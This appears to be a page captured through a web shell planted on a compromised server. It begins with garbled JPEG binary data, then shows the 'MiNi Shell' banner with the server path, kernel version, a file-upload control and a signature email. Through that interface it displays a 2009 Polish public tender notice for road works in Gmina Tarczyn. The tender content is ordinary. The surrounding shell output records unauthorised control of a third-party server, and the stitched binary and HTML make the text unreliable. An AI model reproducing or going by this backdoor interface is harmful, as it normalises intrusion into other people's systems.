JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090527/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090527/169366-N-2009.html

<p class="kh_header"><b>Tarczyn: Roboty drogowe na terenie Gminy Tarczyn</b><br>
<b>Numer ogłoszenia: 169366 - 2009; data zamieszczenia: 27.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tarczyn , ul. Rynek 8a, 05-555 Tarczyn, woj. mazowieckie, tel. 022 7157900, 7157938, faks 022 7278191.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarczyn.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty drogowe na terenie Gminy Tarczyn.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót drogowych na drogach Gminy Tarczyn. Szczegółowe określenie przedmiotu zamówienia zawiera specyfikacja istotnych warunków zamówienia. Zamawiający udziela zamówienia w czterech częściach: zadanie nr 1 - Przebudowa ul. Wspólnej w miejscowości Suchodół; zadanie nr 2 - Modernizacja ul. Kościelnej w Jeżewicach; zadanie nr 3 - Modernizacja ul. Ziołowej i Brzozowej w miejscowości Janówek; zadanie nr 4 - Remont ul. Dębowej w miejscowości Pawłowice..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium (dla każdego zadania osobno) w wysokości po 2 500,00 zł (słownie: dwa tysiące pięćset zł 00/100)
Wadium w pieniądzu w zł (PLN) należy wnieść przelewem na konto Urzędu Miejskiego z siedzibą w Tarczynie przy ulicy Rynek 8a zlokalizowane w  Banku DnB NORD Polska S.A., na numer konta: 61 1370 1138 0000 1804 4681 4002. Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin wpływu na rachunek bankowy Zamawiającego. Na przelewie powinno widnieć Wadium w przetargu pn.: Roboty drogowe na terenie Gminy Tarczyn - zadanie numer ___ /wpisać numer zadania/ ________ /wpisać nazwę zadania/
Wadium wniesione w formach, określonych w art. 45 ust. 6 pkt. 2-pkt. 5 Pzp należy złożyć w oryginale w kasie Urzędu Miejskiego w Tarczynie. Zamawiający dopuszcza, aby wadium wnoszone w formie innej niż pieniężna było załączone do oferty - jako jej luźna, niezszyta część. 
W przypadku wniesienia wadium w formach przewidzianych w art. 45 ust. 6 pkt. 2-pkt. 5 Pzp dokumenty takie muszą zawierać następujące informacje: 
określenie przedmiotu przetargu - należy wpisać nazwę: Roboty drogowe na terenie Gminy Tarczyn - zadanie numer___ /wpisać numer zadania/ ___________ /wpisać nazwę zadania/; 
określenie podmiotu, który wystawia gwarancję lub poręczenie; 
określenie beneficjanta gwarancji lub poręczenia: Gmina Tarczyn; ul. Rynek 8a; kod:05-555 Tarczyn,; 
określenie podmiotu, na rzecz którego wystawiana jest gwarancja lub poręczenie - dane wykonawcy; jeżeli ofertę składa  konsorcjum lub inny podmiot wspólny w gwarancji lub poręczeniu muszą być wymienione wszystkie podmioty wchodzące w jego skład, chyba że umowa podmiotu wspólnego stanowi inaczej; 
określenie kwoty gwarancji lub poręczenia - musi ona odpowiadać kwocie wadium; kwota wadium ma być wyrażona w złotych polskich i ma wynikać wprost z treści gwarancji lub poręczenia; 
gwarancja lub poręczenie musi zapewnić wypłatę pełnej kwoty wadium przetargowego - w razie zaistnienia okoliczności określonych w art. 46 ust. 4a i ust. 5 Pzp; 
określenie terminu ważności gwarancji lub poręczenia - okres ten nie może być krótszy niż 30 dni, licząc od dnia, w którym upłynął termin składania ofert; 
gwarancja lub poręczenie powinno zawierać stwierdzenie, że podmiot wystawiający gwarancję wypłaci beneficjantowi świadczenie na pierwsze żądanie w terminie nie dłuższym niż 30 dni od dnia zgłoszenia żądania.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca nie może podlegać wykluczeniu z ubiegania się o udzielenie zamówienia publicznego określonego w pkt. 2 siwz - na podstawie art. 22 ust. 1 i art. 24 ust. 1 i ust. 2 Pzp oraz rozporządzenia Prezesa Rady Ministrów z dnia 10 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2006 roku Nr 87, poz. 605 ze zm.).
Wykonawca musi posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i doświadczoną kadrą zdolną do wykonania przedmiotowego zamówienia, tj.: 
a) ma dysponować lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia co najmniej następujących urządzeń: dla zadania numer 1 i numer 4 - rozkładarka do kruszywa, samochód samowyładowczy, walec statyczny samojezdny; dla zadania numer 2 i numer 3 - rozkładarka mas bitumicznych, skrapiarka do bitumu, samochód samowyładowczy, walec statyczny samojezdny;
b) należycie wykonał w ciągu ostatnich 5 lat (termin ten należy liczyć od dnia wszczęcia postępowania), a jeżeli okres działalności jest krótszy, w tym okresie, co najmniej 3 roboty budowlane (osobno dla każdego zadania) odpowiadające swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, tj. 3 roboty polegające na budowie (przebudowie, rozbudowie, modernizacji lub remoncie) drogi: dla zadania numer 1 - o długości co najmniej 600 mb lub powierzchni co najmniej 3 000 m2 o podbudowie lub nawierzchni z kruszywa - osobno każda z robót; dla zadania numer 2 i numer 3 - o długości co najmniej 300 mb lub powierzchni co najmniej 1 500 m2 o nawierzchni asfaltowej - osobno każda z robót, dla zadania numer 4 - o długości co najmniej 200 mb o powierzchni 1 000 m2 o podbudowie lub nawierzchni z kruszywa - osobno każda robót- osobno każda robót.   Ocena spełnienia warunków udziału w postępowaniu - ocena: spełnia-nie spełnia. Zamawiający uzna, że wykonawca spełnia wszystkie warunki udziału w postępowaniu, w przypadku, gdy załączy on do oferty wszystkie dokumenty wymienione w pkt. 3.3 siwz, spełniające wymogi wskazane  w przepisach..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykazanie niepodlegania wykonawcy wykluczeniu z postępowania oraz wykazanie, że oferowane roboty odpowiadają wymogom określonym w siwz przez zamawiającego, należy dokonać niżej wymienionymi dokumentami w postaci oryginałów lub kserokopii potwierdzonych przez wykonawcę, jak w pkt 1.12 siwz:
W celu potwierdzenia uprawnień do wykonania przedmiotu zamówienia - § 1 ust. 1 rozporządzenia: 
Krajowy rejestr sądowy firmy lub zaświadczenie o wpisie do ewidencji działalności gospodarczej lub/i inne odpowiednie dokumenty (podmiot mający siedzibę lub miejsce zamieszkania na terenie Rzeczypospolitej Polskiej) - wystawiony nie wcześniej niż na 6 miesięcy przed upływem terminu składania ofert. 
Oświadczenie o niepodleganiu wykluczeniu wykonawcy z postępowania zgodnie z art. 22 i 24 Pzp - załącznik numer 3 do siwz. 
W celu potwierdzenia niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i   osobami zdolnymi do wykonania zamówienia - § 1 ust. 2 rozporządzenia: 
Wykaz wykonanych w ciągu ostatnich 5 lat (termin ten należy liczyć od dnia wszczęcia postępowania), a jeżeli okres działalności jest krótszy, w tym okresie, co najmniej 3 robót budowlanych (3 roboty osobno dla każdego zadania), odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, tj.  3 robót polegających na budowie (przebudowie, rozbudowie, modernizacji lub remoncie) drogi: dla zadania numer 1 - o długości co najmniej 600 mb lub powierzchni co najmniej 3 000 m2 o podbudowie lub nawierzchni z kruszywa - osobno każda z robót; dla zadania numer 2 i numer 3 - o długości co najmniej 300 mb lub powierzchni co najmniej 1 500 m2 o nawierzchni asfaltowej - osobno każda z robót, dla zadania numer 4 - o długości co najmniej 200 mb lub powierzchni co najmniej 1 000 m2 o podbudowie lub nawierzchni z kruszywa - osobno każda robót- osobno każda robót - załącznik numer 5 do siwz.
Potwierdzenie że roboty o których mowa w pkt. 3.3.3. siwz zostały wykonane należycie.
Wykaz maszyn i urządzeń niezbędnych do wykonania przedmiotu zamówienia - wykonawca ma wykazać, że dysponuje lub będzie dysponował co najmniej następującym sprzętem, który wykorzysta do realizacji zamówienia: dla zadania numer 1 i numer 4 - rozkładarka do kruszywa, samochód samowyładowczy, walec statyczny samojezdny; dla zadania numer 2 i numer 3 - rozkładarka mas bitumicznych, skrapiarka do bitumu, samochód samowyładowczy, walec statyczny samojezdny- załącznik numer 6 do siwz.
Pisemne zobowiązanie innych podmiotów do udostępnienia urządzeń, o których mowa w pkt. 3.2a siwz, jeżeli w wykazie, o którym mowa w pkt. 3.3.5 siwz Wykonawca wskazał urządzenia, którymi będzie dysponował w chwili rozpoczęcia robót (a nie dysponuje nimi w chwili składania oferty)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.tarczyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tarczynie, Rynek 8a, 05-555 Tarczyn, pok. nr 14 na I piętrze w godz. 9:00-15:00 lub zostanie przesłana na pisemny wniosek.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2009 godzina 10:00, miejsce: Urząd Miejski w Tarczynie, Rynek 8a, 05-555 Tarczyn, pok. nr 2 na parterze (Punkt obsługi interesantów).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa ul. Wspólnej w miejscowości Suchodół.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie przebudowy ul. Wspólnej w miejscowości Suchodół na długości 1 200 mb.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Modernizacja ul. Kościelnej w Jeżewicach.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest modernizacja ul. Kościelnej w Jeżewicach na długości 505 mb.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Modernizacja ul. Ziołowej i Brzozowej w miejscowości Janówek.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przemdotem zamówienia jest modernizacja ul. Brzozozwej i ul. Ziołowej w miejscowości Janówek na łącznej długości 340 mb.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remont ul. Dębowej w miejscowości Pawłowice.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont ul. Dębowej w miejscowości Pawłowice na długości 240 mb.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com